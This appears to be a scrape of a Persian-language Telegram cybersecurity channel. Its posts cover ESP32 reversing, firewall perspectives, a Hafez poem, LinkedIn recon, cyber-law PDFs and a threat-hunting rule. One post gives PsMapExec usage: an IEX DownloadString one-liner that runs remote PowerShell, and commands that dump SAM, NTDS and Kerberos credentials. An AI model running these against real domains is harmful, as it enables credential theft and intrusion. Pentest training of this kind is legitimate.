#reverse #guide
ریورس و تحلیل امنیتی سیستم خانه هوشمند مبتنی بر ESP32
هدف اصلی پروژه، دسترسی به کنترل از راه دور دستگاه و یکپارچهسازی آن با Home Assistant است.
اما برای رسیدن به این هدف باید چند مرحله پیچیده را پشت سر گذاشت از جمله:
⦁ آنالیز اپلیکیشن موبایل مربوطه
⦁ بازکردن فیزیکی دستگاه
⦁ ریورس مهندسی (reverse engineering)
⦁ تحلیل رمزنگاری (cryptographic analysis)
این مراحل کمک میکنند عملکرد سیستم و پروتکلهای امنیتی آن بهطور دقیق بررسی شود و راه دسترسی امن و کامل به کنترل از راه دور فراهم شود.
لینک
@TryHackBox
ریورس و تحلیل امنیتی سیستم خانه هوشمند مبتنی بر ESP32
هدف اصلی پروژه، دسترسی به کنترل از راه دور دستگاه و یکپارچهسازی آن با Home Assistant است.
اما برای رسیدن به این هدف باید چند مرحله پیچیده را پشت سر گذاشت از جمله:
⦁ آنالیز اپلیکیشن موبایل مربوطه
⦁ بازکردن فیزیکی دستگاه
⦁ ریورس مهندسی (reverse engineering)
⦁ تحلیل رمزنگاری (cryptographic analysis)
این مراحل کمک میکنند عملکرد سیستم و پروتکلهای امنیتی آن بهطور دقیق بررسی شود و راه دسترسی امن و کامل به کنترل از راه دور فراهم شود.
لینک
@TryHackBox
👍6
🔖 بازی رمز عبور یک بازی پازل مرورگری محبوب و عجیب در اینترنت است که توسط نیل آگاروال ساخته شده است، جایی که بازیکن باید رمز عبوری بسازد که با قوانین روزافزون عجیب و غریب و غیرمعمول مطابقت داشته باشد، قوانینی که شامل مسائل ریاضی، قوانین شطرنج، بازیهایی مانند GeoGuessr و پازلهای منطقی میشود.
بازی با الزامات ساده شروع میشود (طول، اعداد، حروف)، اما به سرعت پیچیده میشود و از بازیکن میخواهد از منطق، تداعیها، دانش و ذکاوت برای برآورده کردن تمام شرایط قبلی استفاده کند تا به مرحله بعدی برود.
تو چند مرحله از بازی را میتوانی پشت سر بگذاری؟
https://neal.fun/password-game/
#game #password
@TryHackBox
بازی با الزامات ساده شروع میشود (طول، اعداد، حروف)، اما به سرعت پیچیده میشود و از بازیکن میخواهد از منطق، تداعیها، دانش و ذکاوت برای برآورده کردن تمام شرایط قبلی استفاده کند تا به مرحله بعدی برود.
تو چند مرحله از بازی را میتوانی پشت سر بگذاری؟
https://neal.fun/password-game/
#game #password
@TryHackBox
👏4❤1
🛡 فایروال: دیوار دفاعی شبکه! 🔥
فایروال اولین خط دفاعی هر شبکهای هست که ترافیک ورودی و خروجی رو بر اساس سیاستهای امنیتی کنترل میکنه.
✍️نویسنده
@TryHackBoxStory | The Chaos
#FireWall #Network #CyberSecurity #Blog
فایروال اولین خط دفاعی هر شبکهای هست که ترافیک ورودی و خروجی رو بر اساس سیاستهای امنیتی کنترل میکنه.
✍️نویسنده
@TryHackBoxStory | The Chaos
#FireWall #Network #CyberSecurity #Blog
👍6❤1
از دیدگاه هکر (Attacker View) 🔴
🛡 فایروال: از نگاه هکرها!
هکر اینجا صحبت میکند:
"فایروال اولین دیواری هست که باید بشکنم! اینجا نقطهضعفهایی که دنبالش میگردم:
🔸 قواعد ضعیف:
فایروالهایی که Deny All ندارند
پورتهای باز غیرضروری (مثل 21, 23, 135)
قرار دادن ACLهای نامحدود
🔸 کانفیگهای غلط:
کانفیگ DMZ با دسترسی به شبکه داخلی
قواعد NAT شل و نامحدود
ایجاد VPN با احراز هویت ضعیف
🔸 منفذهای نفوذ:
فایروالهای آپدیت نشده
غیرفعال بودنLogging
داشتن IDS/IPS با Signatureهای قدیمی
💡 نکته: فایروال فقط به اندازه ضعیفترین قاعدهاش امنه!
از دیدگاه مدیر فناوری (IT Manager) 🟡
🛡 فایروال: چالشهای مدیریتی
به عنوان مدیر IT، این چالشها رو دارم:
🔹 بالانس امنیت و کارایی:
چطور امن باشیم بدون کند کردن سرویسها؟
مدیریت ترافیک encrypted
پاسخ به درخواستهای بخشهای مختلف
🔹 مدیریت پیچیده:
نگهداری از صدها قاعده
عیبیابی مسائل شبکه
مستندسازی قواعد
🔹 منابع محدود:
بودجه برای آپدیت سختافزار
نیروی متخصص برای پایش 24/7
آموزش مستمر تیم
💡 راهحل: اتوماسیون، مانیتورینگ مداوم و آموزش تیم
از دیدگاه تیم آبی (Blue Team) 🔵
🛡 فایروال: سلاح تیم آبی
ما در تیم آبی اینطور از فایروال استفاده میکنیم:
✅ استراتژی دفاع لایهای:
فایروال اولین لایه از ۷ لایه امنیتی
ترکیب با IPS, WAF, EDR
دفاع عمقی (Defense in Depth)
✅ مانیتورینگ پیشرفته:
آنالیز ترافیک شمالی-جنوبی
تشخیص ناهنجاریهای رفتاری
یکپارچهسازی با SIEM
✅ پاسخ به حادثه:
مسدود کردن سریع IPهای مخرب
ایجاد قواعد موقت هنگام حمله
آنالیز لاگها برای Forensics
🔥 نکته کلیدی: فایروال هوشمند + تحلیلگر حرفهای = دفاع قدرتمند
✍️نویسنده
@TryHackBoxStory | The Chaos
#FireWall #Network #CyberSecurity #IT #Blog
🛡 فایروال: از نگاه هکرها!
هکر اینجا صحبت میکند:
"فایروال اولین دیواری هست که باید بشکنم! اینجا نقطهضعفهایی که دنبالش میگردم:
🔸 قواعد ضعیف:
فایروالهایی که Deny All ندارند
پورتهای باز غیرضروری (مثل 21, 23, 135)
قرار دادن ACLهای نامحدود
🔸 کانفیگهای غلط:
کانفیگ DMZ با دسترسی به شبکه داخلی
قواعد NAT شل و نامحدود
ایجاد VPN با احراز هویت ضعیف
🔸 منفذهای نفوذ:
فایروالهای آپدیت نشده
غیرفعال بودنLogging
داشتن IDS/IPS با Signatureهای قدیمی
💡 نکته: فایروال فقط به اندازه ضعیفترین قاعدهاش امنه!
از دیدگاه مدیر فناوری (IT Manager) 🟡
🛡 فایروال: چالشهای مدیریتی
به عنوان مدیر IT، این چالشها رو دارم:
🔹 بالانس امنیت و کارایی:
چطور امن باشیم بدون کند کردن سرویسها؟
مدیریت ترافیک encrypted
پاسخ به درخواستهای بخشهای مختلف
🔹 مدیریت پیچیده:
نگهداری از صدها قاعده
عیبیابی مسائل شبکه
مستندسازی قواعد
🔹 منابع محدود:
بودجه برای آپدیت سختافزار
نیروی متخصص برای پایش 24/7
آموزش مستمر تیم
💡 راهحل: اتوماسیون، مانیتورینگ مداوم و آموزش تیم
از دیدگاه تیم آبی (Blue Team) 🔵
🛡 فایروال: سلاح تیم آبی
ما در تیم آبی اینطور از فایروال استفاده میکنیم:
✅ استراتژی دفاع لایهای:
فایروال اولین لایه از ۷ لایه امنیتی
ترکیب با IPS, WAF, EDR
دفاع عمقی (Defense in Depth)
✅ مانیتورینگ پیشرفته:
آنالیز ترافیک شمالی-جنوبی
تشخیص ناهنجاریهای رفتاری
یکپارچهسازی با SIEM
✅ پاسخ به حادثه:
مسدود کردن سریع IPهای مخرب
ایجاد قواعد موقت هنگام حمله
آنالیز لاگها برای Forensics
🔥 نکته کلیدی: فایروال هوشمند + تحلیلگر حرفهای = دفاع قدرتمند
✍️نویسنده
@TryHackBoxStory | The Chaos
#FireWall #Network #CyberSecurity #IT #Blog
❤8👍4
Media is too big
VIEW IN TELEGRAM
در سالنامه ایرانی بیستم مهر ماه روز بزرگداشت رند شیراز(حافظ) است.
هرچند تابی نمانده و نه دلی...
بماند به یادگار...
شاید سال دیگر شادمانهتر دیدیماش
که بندی نبود، ستمی نبود، دلها خوش بودند
و جانها شاداب و ...
جان، بی جمال ِ جانان میل ِ جهان ندارد
هر کس که این ندارد، حقا که آن ندارد
با هیچکس نشانی زآن دلستان ندیدم
یا من خبر ندارم؛ یا او نشان ندارد
هر شبنمی در این ره صد بحر ِ آتشین است
دردا که این معما شرح و بیان ندارد
سرمنزل ِ فراغت نتوان زِ دست دادن
ای ساروان! فروکش! کاین رَه کران ندارد
چنگ ِ خمیده قامت میخوانَد ت به عشرت
بشنو! که پند ِ پیران هیچات زیان ندارد
ای دل! طریق ِ رندی از محتسب بیاموز
مست است و در حق ِ او کس این گمان ندارد
احوال ِ گنج ِ قارون -کایام داد بر باد-
در گوش ِ دل فروخوان؛ تا زَر نهان ندارد
گر خود، رقیب، شمع است؛ اَسرار از او بپوشان
کآن شوخ ِ سَربُریده، بند ِ زبان ندارد
کس در جهان ندارد یک بنده همچو حافظ
زیرا که: چون تو شاهی کس در جهان ندارد.
خوانش: فریدون فرحاندوز
روز بزرگداشت"رند شیرازی"
@TryHackBox
هرچند تابی نمانده و نه دلی...
بماند به یادگار...
شاید سال دیگر شادمانهتر دیدیماش
که بندی نبود، ستمی نبود، دلها خوش بودند
و جانها شاداب و ...
جان، بی جمال ِ جانان میل ِ جهان ندارد
هر کس که این ندارد، حقا که آن ندارد
با هیچکس نشانی زآن دلستان ندیدم
یا من خبر ندارم؛ یا او نشان ندارد
هر شبنمی در این ره صد بحر ِ آتشین است
دردا که این معما شرح و بیان ندارد
سرمنزل ِ فراغت نتوان زِ دست دادن
ای ساروان! فروکش! کاین رَه کران ندارد
چنگ ِ خمیده قامت میخوانَد ت به عشرت
بشنو! که پند ِ پیران هیچات زیان ندارد
ای دل! طریق ِ رندی از محتسب بیاموز
مست است و در حق ِ او کس این گمان ندارد
احوال ِ گنج ِ قارون -کایام داد بر باد-
در گوش ِ دل فروخوان؛ تا زَر نهان ندارد
گر خود، رقیب، شمع است؛ اَسرار از او بپوشان
کآن شوخ ِ سَربُریده، بند ِ زبان ندارد
کس در جهان ندارد یک بنده همچو حافظ
زیرا که: چون تو شاهی کس در جهان ندارد.
خوانش: فریدون فرحاندوز
روز بزرگداشت"رند شیرازی"
@TryHackBox
❤10
مقدمات فایروال.pdf
778.8 KB
✏️ مقاله تالیف شده
مقدمات فایروال
✍️نویسنده
@TryHackBox | The Chaos
#FireWall #Cybersecurity #Networking
مقدمات فایروال
✍️نویسنده
@TryHackBox | The Chaos
#FireWall #Cybersecurity #Networking
❤3🔥1
Recon-User-LinkedIn-Part1-THB-Team.pdf
1.1 MB
🔖 در این آموزش از تیم TryHackBox، به بررسی reconnaissance بر پایه LinkedIn میپردازیم. یاد میگیرید چطور ساختار سازمانی رو نقشهبرداری کنید، اهداف کلیدی رو شناسایی کنید و از ابزارهایی مثل theHarvester و Maltego برای جمعآوری اطلاعات عمومی استفاده کنید. مثالهای عملی، تمرینهای گامبهگام و چکلیست اخلاقی هم داخلش هست.
@TryHackBox | Github | YouTube | Group
#Recon #OSINT #Linkedin
@TryHackBox | Github | YouTube | Group
#Recon #OSINT #Linkedin
linkedin_results_template.csv
683 B
این فایل مربوط به آموزش بالا میباشد .
@TryHackBox
@TryHackBox
target_list_template.csv
723 B
این فایل مربوط به آموزش بالا میباشد .
@TryHackBox
@TryHackBox
❤5👍5❤🔥1
🔖 grype v0.100.0
اسکنر آسیبپذیری برای containers و فایل سیستم ها
نصب:
راهاندازی:
https://github.com/anchore/grype
@TryHackBox
#grype #soft #golang
اسکنر آسیبپذیری برای containers و فایل سیستم ها
نصب:
curl -sSfL https://get.anchore.io/grype | sudo sh -s -b /usr/local/bin
راهاندازی:
grype scope all-layers
https://github.com/anchore/grype
@TryHackBox
#grype #soft #golang
قوانین سایبری در ایران و مجازات.pdf
831.3 KB
⚖ آشنایی با قوانین جرایم سایبری در ایران
💢 اگر در حوزه امنیت سایبری، تست نفوذ یا ردتیم فعالیت میکنی، حتما باید بدونی چه کارهایی جرم محسوب میشن و مجازاتشون چیه.
⭕ یه اشتباه کوچیک در دنیای سایبری میتونه به جرم بزرگ تبدیل بشه!
💢 قبل از هر تست نفوذ یا فعالیت فنی، قوانین سایبری ایران رو بشناس.
@TryHackBox
#قوانین_سایبری
💢 اگر در حوزه امنیت سایبری، تست نفوذ یا ردتیم فعالیت میکنی، حتما باید بدونی چه کارهایی جرم محسوب میشن و مجازاتشون چیه.
⭕ یه اشتباه کوچیک در دنیای سایبری میتونه به جرم بزرگ تبدیل بشه!
💢 قبل از هر تست نفوذ یا فعالیت فنی، قوانین سایبری ایران رو بشناس.
@TryHackBox
#قوانین_سایبری
👍4👎2🐳1
🔖 PsMapExec v0.9.0
یک به روزرسانی برای ابزار post-exploitation در Active Directory که با PowerShell نوشته شده منتشر شد.
به روز رسانی
ماژول های اضافی در LDAP:
روشها (پروتکل) فعلی که پشتیبانی میشوند:
ماژول های پیاده سازی شده:
https://viperone.gitbook.io/pentest-everything/psmapexec
@TryHackBox
#PowerShell #pentest #redteam #psmapexec
یک به روزرسانی برای ابزار post-exploitation در Active Directory که با PowerShell نوشته شده منتشر شد.
به روز رسانی
پشتیبانی از چند دامنه
بهبود عملکرد از طریق Proxifier / تونلهای SSH
امکان روشن/خاموش کردن RDP
ماژولهای جدید:
EventCreds
ماژول های اضافی در LDAP:
GMSA
ConstrainedDelegation
UnconstrainedDelegation
AdminCount
ComputerSIDs
UserDenoscriptions
UserLogonRestrictions
UserPasswords
UserSIDs
روشها (پروتکل) فعلی که پشتیبانی میشوند:
RDP
SessionHunter
SMB
SMB Signing
LDAP / LDAPS
SSH
Spraying
VNC
WinRM
WMI
MSSQL
Kerberoast
ماژول های پیاده سازی شده:
Amnesiac — اجرای payloadهای Amnesiac C2
ConsoleHistory — تاریخچه در PowerShell
Files — فایلها در دایرکتوریهای متداول
KerbDump — دامپ تیکتهای Kerberos
eKeys — دامپ کلیدها (Mimikatz)
LogonPasswords — دامپ پسوردهای لاگآن (Mimikatz)
LSA — دامپ LSA (Mimikatz)
NTDS — پیادهسازی DCsync
SAM — دامپ SAM
https://viperone.gitbook.io/pentest-everything/psmapexec
@TryHackBox
#PowerShell #pentest #redteam #psmapexec
❤3👍3
Try Hack Box
🔖 PsMapExec v0.9.0 یک به روزرسانی برای ابزار post-exploitation در Active Directory که با PowerShell نوشته شده منتشر شد. به روز رسانی پشتیبانی از چند دامنه بهبود عملکرد از طریق Proxifier / تونلهای SSH امکان روشن/خاموش کردن RDP ماژولهای جدید: EventCreds…
اجرای ابزار از حافظه:
مثالها:
اجرای با کاربر جاری
با پسورد
با هش
با تیکت
دامپ فایل SAM
Kerberoasting
استفاده از ماژول ها
@TryHackBox
#pentest #powershell #psmapexec
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PME-Scripts/main/Invoke-NETMongoose.ps1");IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")مثالها:
اجرای با کاربر جاری
PsMapExec -Targets All -Method [Method]
با پسورد
PsMapExec -Targets All -Method [Method] -Username [Username] -Password [Password]
با هش
PsMapExec -Targets All -Method [Method] -Username [Username] -Hash [RC4/AES256]
با تیکت
PsMapExec -Targets All -Method [Method] -Ticket [doI.. OR Path to ticket file]
دامپ فایل SAM
PsMapExec -Targets DC.domain.local -Method SMB -Ticket [Base64-Ticket] -Module SAM
Kerberoasting
PsMapExec -Method Kerberoast -ShowOutput
استفاده از ماژول ها
PsMapExec -Targets All -Method [Method] -Module [Module]
@TryHackBox
#pentest #powershell #psmapexec
❤7
قوانین سایبری بینالمللی.pdf
601.2 KB
⚖ آشنایی با قوانین سایبری در سطح بین و المللی
⭕ بدون شناخت قوانین جهانی امنیت سایبری، هر فعالیت فنی میتونه دردسرساز بشه!
⭕ این فایل شامل خلاصهای از مهمترین قوانین سایبری در اروپا، آمریکا و سایر کشورهاست.
💢 قوانین سایبری فقط مخصوص ایران نیست .
💢 این فایل یه نگاه جهانی داره به قانونهایی که درباره هک، داده، و امنیت سایبری تصویب شدن.
⭕ حتما بخون قبل از هر تست یا پروژه فنی
@TryHackBox
#قوانین_سایبری_بینالمللی #قوانین_سایبری
⭕ بدون شناخت قوانین جهانی امنیت سایبری، هر فعالیت فنی میتونه دردسرساز بشه!
⭕ این فایل شامل خلاصهای از مهمترین قوانین سایبری در اروپا، آمریکا و سایر کشورهاست.
💢 قوانین سایبری فقط مخصوص ایران نیست .
💢 این فایل یه نگاه جهانی داره به قانونهایی که درباره هک، داده، و امنیت سایبری تصویب شدن.
⭕ حتما بخون قبل از هر تست یا پروژه فنی
@TryHackBox
#قوانین_سایبری_بینالمللی #قوانین_سایبری
❤5👍1
Securelist
Mysterious Elephant APT: TTPs and tools
Kaspersky GReAT experts describe the latest Mysterious Elephant APT activity. The threat actor exfiltrates data related to WhatsApp and employs tools such as BabShell and MemLoader HidenDesk.
امروز برای اولین بار سراغ یک تکنیک کاربردی می ریم که برای شکار تهدید خیلی مفیده
Masquerading: Match Legitimate Resource Name or Location (T1036.005).
مثل همیشه، با یک مثال شروع میکنیم
https://securelist.com/mysterious-elephant-apt-ttps-and-tools/117596/
همانطور که مشاهده میشود، مهاجمان فایلهای مخرب را شبیه ابزارِ معتبر ping جلوه دادهاند. چنین مواردی را میتوان مستند سازی کرد و هم برای تشخیص و هم برای شکار تهدید از آن ها استفاده کرد برای مثال:
@TryHackBox
Masquerading: Match Legitimate Resource Name or Location (T1036.005).
مثل همیشه، با یک مثال شروع میکنیم
https://securelist.com/mysterious-elephant-apt-ttps-and-tools/117596/
C:\ProgramData\Intel\ping.exe
C:\Users\Public\ping.exe
همانطور که مشاهده میشود، مهاجمان فایلهای مخرب را شبیه ابزارِ معتبر ping جلوه دادهاند. چنین مواردی را میتوان مستند سازی کرد و هم برای تشخیص و هم برای شکار تهدید از آن ها استفاده کرد برای مثال:
event_type: "processcreatewin"
AND
proc_file_path: "ping.exe"
AND NOT
proc_file_path: ("windows\system32" OR "windows\syswow64")
@TryHackBox
#سوال
دوستان فکر کنید در یک مصاحبه هستید و ازتون سوال میپرسند :
بزرگترین نقطه قوت شما چیست؟
دوستان فکر کنید در یک مصاحبه هستید و ازتون سوال میپرسند :
بزرگترین نقطه قوت شما چیست؟
جواب هاتون کامنت کنید
❤6👏2
Try Hack Box
#سوال دوستان فکر کنید در یک مصاحبه هستید و ازتون سوال میپرسند : بزرگترین نقطه قوت شما چیست؟ جواب هاتون کامنت کنید
دوستان بات عضویت اجباری برداشته شد راحت میتونید بحث کنید.